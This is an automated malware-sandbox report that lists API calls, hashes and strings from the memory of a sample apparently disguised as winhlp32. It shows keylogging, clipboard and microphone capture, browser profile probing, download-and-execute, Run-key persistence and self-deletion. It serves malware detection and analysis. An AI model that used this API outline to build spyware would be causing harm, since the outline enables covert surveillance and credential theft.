                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadSize
                                    • API String ID: 3919263394-0
                                    • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                    • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                    • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                    • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseHandleOpenProcess
                                    • API String ID: 39102293-0
                                    • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                    • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                    • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                    • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • API String ID: 2633735394-0
                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: MetricsSystem
                                    • API String ID: 4116985748-0
                                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    • API String ID: 1761009282-0
                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                    • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                    • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                    • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 0040B797
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    • API String ID: 1881088180-3686566968
                                    • Opcode ID: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                    • Opcode Fuzzy Hash: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • String ID: ACP$OCP
                                    • API String ID: 0-711371036
                                    • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                    • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 481472006-1507639952
                                    • Opcode ID: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                                    • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                    • Opcode Fuzzy Hash: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                                    • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNEL32 ref: 00416640
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: !D@
                                    • API String ID: 1931167962-604454484
                                    • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                    • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                    • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                    • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: | $%02i:%02i:%02i:%03i
                                    • API String ID: 481472006-2430845779
                                    • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                    • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                    • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                    • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: alarm.wav$hYG
                                    • API String ID: 1174141254-2782910960
                                    • Opcode ID: 724a8e5b2a78711fe386ea7d75e966099d3780ec0f3c0cd73080d917fc9e8b87
                                    • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                    • Opcode Fuzzy Hash: 724a8e5b2a78711fe386ea7d75e966099d3780ec0f3c0cd73080d917fc9e8b87
                                    • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped
                                    • API String ID: 1623830855-1496645233
                                    • Opcode ID: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                    • Opcode Fuzzy Hash: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: wave$BufferHeaderPrepare
                                    • String ID: XMG
                                    • API String ID: 2315374483-813777761
                                    • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                    • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: LocaleValid
                                    • String ID: IsValidLocaleName$JD
                                    • API String ID: 1901932003-2234456777
                                    • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                    • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                    • API String ID: 1174141254-4188645398
                                    • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                    • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                    • API String ID: 1174141254-2800177040
                                    • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                    • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: AppData$\Opera Software\Opera Stable\
                                    • API String ID: 1174141254-1629609700
                                    • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                    • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 0040B64B
                                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                    • String ID: [AltL]$[AltR]
                                    • API String ID: 2738857842-2658077756
                                    • Opcode ID: 812230f2851c1f53bb267e032c67d7b388825b52a5818c82693134c1319f806e
                                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                    • Opcode Fuzzy Hash: 812230f2851c1f53bb267e032c67d7b388825b52a5818c82693134c1319f806e
                                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: uD
                                    • API String ID: 0-2547262877
                                    • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                    • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                    • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                    • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: !D@$open
                                    • API String ID: 587946157-1586967515
                                    • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                    • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    • API String ID: 1649606143-2446555240
                                    • Opcode ID: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                    • Opcode Fuzzy Hash: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: ,kG$0kG
                                    • API String ID: 1881088180-2015055088
                                    • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                    • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteOpenValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 2654517830-1051519024
                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                    • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteDirectoryFileRemove
                                    • String ID: pth_unenc
                                    • API String ID: 3325800564-4028850238
                                    • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                    • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                    • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                    • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ObjectProcessSingleTerminateWait
                                    • String ID: pth_unenc
                                    • API String ID: 1872346434-4028850238
                                    • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                    • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                    • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
